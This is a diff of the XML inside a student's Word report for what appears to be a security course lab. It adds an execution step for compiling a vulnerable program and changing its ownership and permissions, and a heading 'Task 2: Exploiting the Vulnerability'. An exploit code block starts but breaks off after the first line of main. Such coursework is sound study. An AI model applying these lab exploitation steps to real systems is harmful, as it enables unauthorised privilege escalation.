--- a/Project_2_Report_Enze_Xu.docx
+++ b/Project_2_Report_Enze_Xu.docx
@@ -805,6 +805,22 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>t our final step.</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>

--- a/Project_2_Report_Enze_Xu.docx
+++ b/Project_2_Report_Enze_Xu.docx
@@ -1347,11 +1347,48 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Execution</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Compile it, change the ownership, and then change the permission.</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1365,10 +1402,7 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="left"/>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
@@ -1377,15 +1411,111 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65BD358A" wp14:editId="384CF96C">
+            <wp:extent cx="5274310" cy="711200"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:docPr id="1" name="图片 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId13"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5274310" cy="711200"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>2.4 Task 2: Exploiting the Vulnerability</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
       </w:pPr>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="even" r:id="rId13"/>
-      <w:headerReference w:type="default" r:id="rId14"/>
-      <w:footerReference w:type="even" r:id="rId15"/>
-      <w:footerReference w:type="default" r:id="rId16"/>
-      <w:headerReference w:type="first" r:id="rId17"/>
-      <w:footerReference w:type="first" r:id="rId18"/>
+      <w:headerReference w:type="even" r:id="rId14"/>
+      <w:headerReference w:type="default" r:id="rId15"/>
+      <w:footerReference w:type="even" r:id="rId16"/>
+      <w:footerReference w:type="default" r:id="rId17"/>
+      <w:headerReference w:type="first" r:id="rId18"/>
+      <w:footerReference w:type="first" r:id="rId19"/>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1440" w:right="1800" w:bottom="1440" w:left="1800" w:header="851" w:footer="992" w:gutter="0"/>
       <w:cols w:space="425"/>

--- a/Project_2_Report_Enze_Xu.docx
+++ b/Project_2_Report_Enze_Xu.docx
@@ -6,7 +6,7 @@
       <w:pPr>
         <w:jc w:val="left"/>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="0070C0"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
@@ -60,17 +60,17 @@
       <w:pPr>
         <w:jc w:val="left"/>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
         <w:t>2</w:t>
       </w:r>
       <w:r>
@@ -102,7 +102,7 @@
       <w:pPr>
         <w:jc w:val="left"/>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -260,17 +260,17 @@
       <w:pPr>
         <w:jc w:val="left"/>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
         <w:t>2</w:t>
       </w:r>
       <w:r>
@@ -287,15 +287,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>2</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">2 </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -824,17 +816,17 @@
       <w:pPr>
         <w:jc w:val="left"/>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
         <w:t>a</w:t>
       </w:r>
       <w:r>
@@ -882,7 +874,7 @@
       <w:pPr>
         <w:jc w:val="left"/>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -1012,7 +1004,7 @@
       <w:pPr>
         <w:jc w:val="left"/>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -1120,14 +1112,15 @@
       <w:pPr>
         <w:jc w:val="left"/>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -1173,7 +1166,7 @@
       <w:pPr>
         <w:jc w:val="left"/>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -1307,37 +1300,7 @@
           <w:szCs w:val="24"/>
           <w:u w:val="single"/>
         </w:rPr>
-        <w:t>2.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="0070C0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>3</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="0070C0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> T</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="0070C0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>he Vulnerable Program</w:t>
+        <w:t>2.3 The Vulnerable Program</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1407,6 +1370,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
+          <w:noProof/>
           <w:color w:val="FF0000"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
@@ -1465,7 +1429,7 @@
       <w:pPr>
         <w:jc w:val="left"/>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
           <w:color w:val="0070C0"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
@@ -1488,34 +1452,6253 @@
         <w:jc w:val="left"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="left"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>This t</w:t>
+      </w:r>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="FF0000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>ask</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> took me quite a lot of time to try and modify</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> again and again. To begin with, I will give my final answer and then explain the wonderful process about how I get this.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B83A07E" wp14:editId="1C3AB244">
+            <wp:extent cx="4667341" cy="1052484"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="3" name="图片 3"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId14"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4686903" cy="1056895"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>before</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> finishing this task I did 99 commits on my </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>github</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> repo on project2)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>C</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>ode:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="8000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>void</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>main</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="8000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>int</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>argc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="8000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>char</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>**</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>argv</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>{</w:t>
